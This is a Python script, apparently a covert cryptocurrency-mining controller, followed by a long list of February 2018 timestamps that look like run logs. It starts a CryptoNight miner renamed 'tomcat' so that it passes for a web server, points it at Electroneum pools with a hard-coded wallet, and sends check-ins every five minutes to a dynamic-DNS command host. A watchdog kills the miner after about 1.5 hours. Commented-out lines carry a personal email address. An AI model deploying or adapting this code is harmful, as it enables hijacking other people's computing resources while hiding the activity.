import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:30:09.486702
#2018-02-17 17:18:03.787503
#2018-02-17 19:06:02.106209
#2018-02-17 20:56:05.372863
#2018-02-17 22:42:04.423450
#2018-02-18 00:25:06.378160
#2018-02-18 02:16:06.163391
#2018-02-18 04:03:05.736704
#2018-02-18 05:52:04.791973
#2018-02-18 07:43:05.006850
#2018-02-18 09:31:06.175247
#2018-02-18 11:17:05.955271
#2018-02-18 13:03:06.566205
#2018-02-18 14:52:04.690057
#2018-02-18 16:41:06.533571
#2018-02-18 18:30:07.708491
#2018-02-18 20:18:04.778441
#2018-02-18 22:03:05.909754
#2018-02-18 23:52:04.214799
#2018-02-19 01:39:03.963600
#2018-02-19 03:27:06.122639
#2018-02-19 05:12:05.627449
#2018-02-19 06:57:03.530796
#2018-02-19 08:47:05.787329
#2018-02-19 10:37:04.699306
#2018-02-19 12:24:01.227411
#2018-02-19 14:12:08.306350
#2018-02-19 16:02:09.840499
#2018-02-19 17:50:07.717087
#2018-02-19 19:36:06.702648
#2018-02-19 21:24:04.182423
#2018-02-19 23:11:07.025462
#2018-02-20 00:56:02.179992
#2018-02-20 02:46:05.516070
#2018-02-20 04:34:01.789584
#2018-02-20 06:18:05.272586
#2018-02-20 08:03:06.739908
#2018-02-20 09:49:01.447426
#2018-02-20 11:32:07.285906
#2018-02-20 13:21:01.703204
#2018-02-20 15:06:01.600865
#2018-02-20 16:50:07.925007
#2018-02-20 18:38:01.775845
#2018-02-20 20:28:05.799351
#2018-02-20 22:15:04.671593
#2018-02-20 23:56:01.404194
#2018-02-21 01:41:05.257801
#2018-02-21 03:28:04.861755
#2018-02-21 05:16:01.748692
#2018-02-21 07:04:07.787313
#2018-02-21 08:50:02.788635
#2018-02-21 10:37:04.856782
#2018-02-21 12:24:09.390637
#2018-02-21 14:10:10.765921
#2018-02-21 15:55:09.671598
#2018-02-21 17:47:09.317827
#2018-02-21 19:32:07.203098
#2018-02-21 21:19:01.256018
#2018-02-21 23:06:07.959519
#2018-02-22 00:54:07.440810
#2018-02-22 02:42:07.539433
#2018-02-22 04:29:05.070890
#2018-02-22 06:15:03.604163
#2018-02-22 07:59:07.304495
#2018-02-22 09:48:07.632408
#2018-02-22 11:32:08.721022
#2018-02-22 13:20:04.582368
#2018-02-22 15:08:07.543364
#2018-02-22 16:51:01.888801
#2018-02-22 18:39:05.540913
#2018-02-22 20:32:04.699806
#2018-02-22 22:18:01.463343
#2018-02-23 00:04:02.037269
#2018-02-23 01:53:07.741846
#2018-02-23 03:43:08.386747
#2018-02-23 05:28:03.691751
#2018-02-23 07:13:07.281215
#2018-02-23 09:18:01.446521
#2018-02-23 11:25:10.133388
#2018-02-23 13:16:02.148639
#2018-02-23 15:01:06.387848
#2018-02-23 16:49:01.516556
#2018-02-23 18:36:05.182194
#2018-02-23 20:24:07.367388
#2018-02-23 22:11:05.596555
#2018-02-23 23:58:07.984884
#2018-02-24 01:48:01.731280
#2018-02-24 03:34:04.989872
#2018-02-24 05:19:05.997278
#2018-02-24 07:07:04.644314
#2018-02-24 08:56:04.681478
#2018-02-24 10:55:06.970293
#2018-02-24 12:43:01.418496
#2018-02-24 14:32:05.368469
#2018-02-24 16:19:06.086005
#2018-02-24 18:13:03.572177
#2018-02-24 19:58:07.528317
#2018-02-24 21:42:05.088604
#2018-02-25 01:57:01.494057
#2018-02-25 05:45:07.484811
#2018-02-25 11:37:07.883643